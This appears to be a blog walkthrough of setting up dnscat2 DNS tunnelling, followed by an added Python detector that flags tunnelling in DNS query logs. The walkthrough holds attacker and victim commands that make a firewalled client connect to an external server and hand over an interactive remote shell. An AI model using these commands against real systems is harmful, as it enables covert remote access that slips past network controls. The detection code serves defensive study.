dnscat2

Introduction

Wanted to test DNS tunneling and came across dnscat2.
Got a copy from https://github.com/iagox86/dnscat2
Tried it out and it worked.
My setup: a dnscat2 Linux client behind a firewall connects outbound to a dnscat2 server in AWS. socat redirects UDP packets from port 53 to 5333. The dnscat2 server requests a shell on the client and receives an interactive shell.
Will certainly be using this again.

Update – more details

Start socat
socat redirects UDP port 53 to 5333:

attacker$ sudo socat UDP4-RECVFROM:53,fork UDP4-SENDTO:localhost:5333

Install dnscat2 and run it as non-root
No domain name is specified, so in this mode dnscat2 requires clients to query our server directly:

attacker$ ruby ./dnscat2.rb --dnsport=5333 --secret=mysecret

Build and run the dnscat2 client on Linux:

victim$ ./dnscat --dns=server=54.191.x.x --secret=mysecret

On the server side you should see the new session established:

New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
dnscat2> sessions
0 :: main [active]
 crypto-debug :: Debug window for crypto stuff [*]
 dns1 :: DNS Driver running on 0.0.0.0:5333 domains = [*]
 1 :: command (kali) [encrypted and verified] [*] [idle for 19 seconds]

Then, to start an interactive OS shell, attach to the initial session 1 and issue the shell command:

dnscat2> session -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

Run the shell command:

command (kali) 1> shell
Sent request to execute a shell
command (kali) 1> New window created: 2
Shell session created!

Connect to the new session 2:

command (kali) 1> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

Now you can issue shell commands:

sh (kali) 2> id
sh (kali) 2> uid=1000(bob) gid=1001(bob) groups=1001(bob)
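From the defender's side, the setup above leaves recognisable traces: the client sends DNS straight to an external host instead of the corporate resolver, uses record types that can carry data, and packs that data into long encoded labels. The following added example (mine, not code from the post or from the dnscat2 project) scores a constructed DNS query log on those three signals; the approved resolver address, the record types, the thresholds and the log format are all assumptions.

```python
import math
from collections import Counter, defaultdict

# Constructed sample DNS query log, one query per line (not from the original post):
# time src_ip dst_ip qtype qname
SAMPLE_LOG = """\
10:00:01 10.0.0.5 10.0.0.2 A www.example.com.
10:00:02 10.0.0.5 10.0.0.2 AAAA mail.example.com.
10:00:03 10.0.0.7 54.191.0.10 TXT 3a7f1c9e5b0d8246a3f71ce95bd08264.
10:00:03 10.0.0.7 54.191.0.10 CNAME 46280db59ec17f3a6428d0b5e9c1f7a3.
10:00:04 10.0.0.7 54.191.0.10 MX 3a7f1c9e5b0d8246a3f71ce95bd08264.
10:00:05 10.0.0.9 10.0.0.2 A cdn.example.net.
"""

APPROVED_RESOLVERS = {"10.0.0.2"}       # assumption: the only sanctioned internal resolver
TUNNEL_QTYPES = {"TXT", "CNAME", "MX"}  # assumption: record types favoured by DNS tunnels
MAX_LABEL_LEN = 30                       # assumption: labels this long are rare in normal traffic
MAX_LABEL_ENTROPY = 3.5                  # assumption: bits per char; encoded data scores higher
SIGNALS = ("unapproved_dst", "tunnel_qtype", "encoded_label")

def label_entropy(label):
    """Shannon entropy in bits per character of one DNS label (0.0 if empty)."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values()) if n else 0.0

def parse_line(line):
    """Split one log line into its fields; returns None for malformed lines."""
    parts = line.split()
    if len(parts) != 5:
        return None
    _ts, src, dst, qtype, qname = parts
    return {"src": src, "dst": dst, "qtype": qtype.upper(), "qname": qname.rstrip(".")}

def analyze(log_text, approved=APPROVED_RESOLVERS, min_hits=3):
    """Return {src_ip: [signals]} for sources with >= min_hits queries matching a signal."""
    per_src = defaultdict(lambda: dict.fromkeys(SIGNALS, 0))
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = per_src[rec["src"]]
        if rec["dst"] not in approved:           # client talks to the tunnel server directly
            s["unapproved_dst"] += 1
        if rec["qtype"] in TUNNEL_QTYPES:
            s["tunnel_qtype"] += 1
        longest = max(rec["qname"].split("."), key=len)
        if len(longest) >= MAX_LABEL_LEN or label_entropy(longest) >= MAX_LABEL_ENTROPY:
            s["encoded_label"] += 1             # long or high-entropy label carrying data
    return {src: [k for k in SIGNALS if s[k] >= min_hits]
            for src, s in per_src.items() if any(s[k] >= min_hits for k in SIGNALS)}
```

On the sample log only 10.0.0.7 is reported, with all three signals; raising the resolver allowlist to include the external host drops the first signal but the other two still fire.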
